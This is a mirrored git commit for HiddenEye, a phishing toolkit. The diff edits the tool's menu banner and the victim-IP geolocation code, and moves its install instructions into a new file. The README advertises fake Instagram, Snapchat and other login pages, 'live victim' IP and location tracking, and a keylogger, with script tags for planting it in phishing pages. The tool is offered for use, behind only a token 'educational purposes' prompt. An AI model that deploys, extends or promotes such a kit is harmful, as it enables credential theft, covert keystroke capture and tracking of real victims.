mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #162 from DarkSecDevelopers/master
Dev latest update (Just ignore it)
This commit is contained in:
commit
cd3b83a8e7
|
@ -138,7 +138,7 @@ def runMainMenu(): #menu where user select what they wanna use
|
|||
{1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ ███████ {1}||
|
||||
|| ||
|
||||
-----------------------------------------------------------------------------
|
||||
v{3}0{1}.{3}1{1}.{3}0{1} BY:DARKSEC{2}
|
||||
v{3}0{1}.{3}2{1}.{3}2{1} BY:DARKSEC{2}
|
||||
{0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
|
||||
{0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
|
||||
<=============================================================================>
|
||||
|
@ -157,8 +157,7 @@ def runMainMenu(): #menu where user select what they wanna use
|
|||
|
||||
for i in range(101):
|
||||
sleep(0.05)
|
||||
stdout.write(_("{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%").format(RED, DEFAULT, i))
|
||||
system("clear")
|
||||
stdout.write(_("\r{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%").format(RED, DEFAULT, i))
|
||||
stdout.flush()
|
||||
|
||||
if input(_("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}").format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes
|
||||
|
@ -301,7 +300,7 @@ def getCredentials():
|
|||
with open('Server/www/ip.txt') as creds:
|
||||
lines = creds.read().rstrip()
|
||||
if len(lines) != 0:
|
||||
ip = re.match('User Public IP: (.*?)\n', lines).group(1)
|
||||
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
|
||||
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
|
||||
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
|
||||
if 'bogon' in ipinfo:
|
||||
|
|
201
README.md
201
README.md
|
@ -12,155 +12,63 @@
|
|||
|
||||
</p>
|
||||
|
||||
### PREREQUISITES ( Please verify if you have installed )
|
||||
|
||||
### DEVELOPERS:-
|
||||
1) UNDEADSEC (https://github.com/UndeadSec)
|
||||
2) USAMA ABDUL SATTAR (https://github.com/usama7628674)
|
||||
3) ANONUD4Y (https://github.com/An0nUD4Y)
|
||||
4) Artur Tretiak (https://github.com/sTiKyt)
|
||||
5) Micrafast (https://github.com/Micrafast)
|
||||
6) ___________ (WAITING FOR YOU)
|
||||
|
||||
## CREDIT:-
|
||||
* Usama ( A Most active Developer)
|
||||
* Anonud4y ( I can't remember if i have done Anything )
|
||||
* Artur ( Guy Who recustomized everything )
|
||||
* UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)
|
||||
* TheLinuxChoice ( For The ideas from his repo Shellphish )
|
||||
|
||||
### TESTED ON FOLLOWING:-
|
||||
* **Kali Linux - Rolling Edition**
|
||||
* **Parrot OS - Rolling Edition**
|
||||
* **Linux Mint - 18.3 Sylvia**
|
||||
* **Ubuntu - 16.04.3 LTS**
|
||||
* **MacOS High Sierra**
|
||||
* **Arch Linux**
|
||||
* **Manjaro XFCE Edition 17.1.12**
|
||||
* **Black Arch**
|
||||
|
||||
### PREREQUISITES ( Please verify if you have installed )
|
||||
* Python 3
|
||||
* Wget from Python
|
||||
* PHP
|
||||
* sudo
|
||||
|
||||
### WHAT'S NEW FEATURES
|
||||
**1) LIVE ATTACK**
|
||||
- Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
|
||||
|
||||
### TESTED ON FOLLOWING
|
||||
* **Kali Linux - Rolling Edition**
|
||||
**2) COMPATIBILITY**
|
||||
- All the sites are mobile compatible.
|
||||
|
||||
* **Parrot OS - Rolling Edition**
|
||||
**3) KEYLOGGER**
|
||||
- Now you will also have the ability to capture all the keystokes of victim.
|
||||
|
||||
* **Linux Mint - 18.3 Sylvia**
|
||||
**(CURRENTLY):- This feature is added on instagram web page and github, to less the possibility of slow functioning of generated link)
|
||||
|
||||
* **Ubuntu - 16.04.3 LTS**
|
||||
**HOW TO ADD IT MANUALLY ?
|
||||
-- You can add this manually by putting the codes on index page.(put these code at anywhere inside the index page // but not between any other script codes)
|
||||
|
||||
* **MacOS High Sierra**
|
||||
|
||||
* **Arch Linux**
|
||||
|
||||
* **Manjaro XFCE Edition 17.1.12**
|
||||
|
||||
* **Black Arch**
|
||||
|
||||
|
||||
## HOW TO INSTALL
|
||||
```
|
||||
<script src="keylogger.js"></script>
|
||||
<script src="keylogger.php"></script>
|
||||
|
||||
```
|
||||
### CLONE
|
||||
```
|
||||
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
||||
```
|
||||
|
||||
### RUNNING (In Linux)
|
||||
|
||||
```
|
||||
cd HiddenEye
|
||||
```
|
||||
|
||||
```
|
||||
sudo apt install python3-pip
|
||||
```
|
||||
|
||||
```
|
||||
sudo pip3 install -r requirements.txt
|
||||
```
|
||||
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
```
|
||||
|
||||
```
|
||||
python3 HiddenEye.py
|
||||
|
||||
```
|
||||
OR
|
||||
|
||||
```
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
### RUNNING (If distro based on Arch Linux)
|
||||
|
||||
```
|
||||
cd HiddenEye
|
||||
```
|
||||
|
||||
```
|
||||
sudo pacman -Syu
|
||||
```
|
||||
```
|
||||
sudo pacman -S python-pip
|
||||
```
|
||||
|
||||
```
|
||||
sudo pip3 install -r requirements.txt
|
||||
```
|
||||
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
```
|
||||
|
||||
```
|
||||
python3 HiddenEye.py
|
||||
|
||||
```
|
||||
OR
|
||||
|
||||
```
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
|
||||
### RUNNING (For Android users in Termux)
|
||||
|
||||
```
|
||||
First install { Termux } from Playstore.
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
After opening Follow below commands One by one
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
pkg install git python php curl openssh grep
|
||||
|
||||
```
|
||||
```
|
||||
pip3 install wget
|
||||
|
||||
```
|
||||
```
|
||||
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
||||
|
||||
```
|
||||
```
|
||||
cd HiddenEye
|
||||
|
||||
```
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
|
||||
```
|
||||
```
|
||||
python HiddenEye.py
|
||||
|
||||
or
|
||||
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
### Running (One Code installation in Termux)
|
||||
|
||||
|
||||
```
|
||||
First install { Termux } from Playstore.
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
After opening Copy and run this Single Command.
|
||||
|
||||
```
|
||||
```
|
||||
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
|
||||
|
||||
```
|
||||
## FOR FURTHER INSTALLATION PROCEDURE - (CHECK INSTRUCTIONS)
|
||||
|
||||
## AVAILABLE PAGES
|
||||
|
||||
|
@ -191,30 +99,7 @@ pkg install git python php curl openssh grep && pip3 install wget && git clone h
|
|||
|
||||
**+ Instagram:**
|
||||
- Traditional Instagram login page.
|
||||
- Instagram Autoliker Phishing Page [ ADVANCED METHOD ADOPTED ].
|
||||
|
||||
### WHAT'S NEW FEATURES
|
||||
**1) LIVE ATTACK**
|
||||
- Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
|
||||
|
||||
**2) COMPATIBILITY**
|
||||
- All the sites are mobile compatible.
|
||||
|
||||
**3) KEYLOGGER**
|
||||
- Now you will also have the ability to capture all the keystokes of victim.
|
||||
|
||||
**(CURRENTLY):- This feature is added on instagram web page and github, to less the possibility of slow functioning of generated link)
|
||||
|
||||
**HOW TO ADD IT MANUALLY ?
|
||||
-- You can add this manually by putting the codes on index page.(put these code at anywhere inside the index page // but not between any other script codes)
|
||||
|
||||
```
|
||||
<script src="keylogger.js"></script>
|
||||
<script src="keylogger.php"></script>
|
||||
|
||||
```
|
||||
|
||||
|
||||
- Instagram Autoliker Phishing Page.
|
||||
|
||||
### NEW PAGES
|
||||
<p align="center">
|
||||
|
@ -227,7 +112,7 @@ pkg install git python php curl openssh grep && pip3 install wget && git clone h
|
|||
|
||||
**2) INSTAGRAM PHISHING:**
|
||||
- Traditional Login Page
|
||||
- Fake instagram Autoliker Page [ REDIRECTS TO ORIGINAL AUTOLIKER PAGE AFTER SUBMIT ]
|
||||
- Fake instagram Autoliker Page
|
||||
|
||||
**3) SNAPCHAT PHISHING:**
|
||||
- Traditional Snapchat Login Page
|
||||
|
|
123
instructions.md
Normal file
123
instructions.md
Normal file
|
@ -0,0 +1,123 @@
|
|||
## HOW TO INSTALL
|
||||
|
||||
### CLONE
|
||||
```
|
||||
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
||||
```
|
||||
|
||||
### RUNNING (In Linux)
|
||||
|
||||
```
|
||||
cd HiddenEye
|
||||
```
|
||||
|
||||
```
|
||||
sudo apt install python3-pip
|
||||
```
|
||||
|
||||
```
|
||||
sudo pip3 install -r requirements.txt
|
||||
```
|
||||
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
```
|
||||
|
||||
```
|
||||
python3 HiddenEye.py
|
||||
|
||||
```
|
||||
OR
|
||||
|
||||
```
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
### RUNNING (If distro based on Arch Linux)
|
||||
|
||||
```
|
||||
cd HiddenEye
|
||||
```
|
||||
|
||||
```
|
||||
sudo pacman -Syu
|
||||
```
|
||||
```
|
||||
sudo pacman -S python-pip
|
||||
```
|
||||
|
||||
```
|
||||
sudo pip3 install -r requirements.txt
|
||||
```
|
||||
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
```
|
||||
|
||||
```
|
||||
python3 HiddenEye.py
|
||||
|
||||
```
|
||||
OR
|
||||
|
||||
```
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
|
||||
### RUNNING (For Android users in Termux)
|
||||
|
||||
```
|
||||
First install { Termux } from Playstore.
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
After opening Follow below commands One by one
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
pkg install git python php curl openssh grep
|
||||
|
||||
```
|
||||
```
|
||||
pip3 install wget
|
||||
|
||||
```
|
||||
```
|
||||
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
|
||||
|
||||
```
|
||||
```
|
||||
cd HiddenEye
|
||||
|
||||
```
|
||||
```
|
||||
chmod 777 HiddenEye.py
|
||||
|
||||
```
|
||||
```
|
||||
python HiddenEye.py
|
||||
|
||||
or
|
||||
|
||||
./HiddenEye.py
|
||||
|
||||
```
|
||||
### Running (One Code installation in Termux)
|
||||
|
||||
|
||||
```
|
||||
First install { Termux } from Playstore.
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
After opening Copy and run this Single Command.
|
||||
|
||||
```
|
||||
```
|
||||
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
|
||||
|
||||
```
|
Loading…
Reference in New Issue
Block a user